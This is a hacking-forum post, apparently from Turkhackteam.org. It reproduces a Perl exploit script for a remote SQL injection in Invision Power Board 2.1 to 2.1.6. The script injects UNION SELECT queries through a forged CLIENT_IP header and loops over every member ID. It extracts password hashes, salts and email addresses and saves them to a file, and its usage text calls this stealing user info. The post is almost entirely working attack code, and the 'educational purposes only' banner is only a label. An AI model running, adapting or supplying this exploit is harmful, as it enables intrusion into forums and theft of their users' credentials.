Invision Power Board 2.1 <= 2.1.6 Remote SQL Injection Exploit

NightWolf

Emektar
27 Ara 2005
722
11
about:home
Kod:
#!/usr/bin/perl
use LWP::UserAgent; 
$ua = LWP::UserAgent->new; 
&header();
if (@ARGV < 2) {&info(); exit();}
$server = $ARGV[0];
$dir = $ARGV[1];
print "[+] SERVER {$server}\r\n";
print "[+] DIR {$dir}\r\n";
#Step 1, detecting vulnerability
print "[1] Testing forum vulnerability...";
$q = "UNION SELECT 'VULN',1,1,1/*";
query($q,$server,$dir);
if($rep =~/VULN/){ print "forum vulnerable\r\n"; }
else 
  {
   print "forum unvulnerable\r\n";
   &footer();
   exit();
  }
#Step 2, detecting prefix
print "[2] Searching prefix...";
$q = "";
query($q,$server,$dir);
$prefix = $rep;
print $prefix."\r\n";
#Step 3, make query
print "[3] Performing query; it may take several minutes, plz, wait...\r\n";
$q1 = "UNION SELECT MAX(converge_id),1,1,1 FROM ".$prefix."members_converge/*";
query($q1,$server,$dir);
$kol = $rep;
open(RES,">".$server."_result.txt");
for($id = 1; $id <= $kol; $id++)
  {
   $own_query = "UNION SELECT converge_pass_hash,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
   query($own_query,$server,$dir);
   if($rep=~/[0-9a-f]{32}/i) 
    {
     $hash = $rep;
     $own_query = "UNION SELECT converge_pass_salt,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
     query($own_query,$server,$dir);
     if(length($rep)==5) 
      {
       $salt = $rep;
       $own_query = "UNION SELECT converge_email,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
       query($own_query,$server,$dir);
       if(length($rep)>0)
        {
         $email = $rep;
         print RES $id.":".$hash.":".$salt."::".$email."\n";
        }
      }     
    }
  }
close(RES);
print "[!] Query was successfully perfomed. Results are in txt files\r\n";
&footer();
$ex = <STDIN>;
sub footer()
  {
   print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n";
   print "[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n";
  }
sub header()
{
print q(
----------------------------------------------------------
* Invision Power Board 2.1.* Remote SQL Injecton Exploit *
*    Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc)  *
*        Coded by w4g.not null          *
*       FOR EDUCATIONAL PURPOSES *ONLY*      *
----------------------------------------------------------
);
}
sub info()
{
 print q(
[i] Usage: perl w4gipb216.pl [server] [/dir/]
   where
    |- server - server, where IPB installed without http://
    |- /dir/ - dir, where IPB installed or / for no dir
   e.g perl w4gipb216.pl someserver.com /forum/
[i] Stealing info about users (format id:pass:salt::email)   
[!] Need MySQL > 4.0 
 );
}
sub query()
  {
   my($q,$server,$dir) = @_;
   $res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"' ".$q); 
   if($res->is_success)
    {
     $rep = '';
     if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
     else
        {
       if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; }
      }
    }
   return $rep;
  }
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.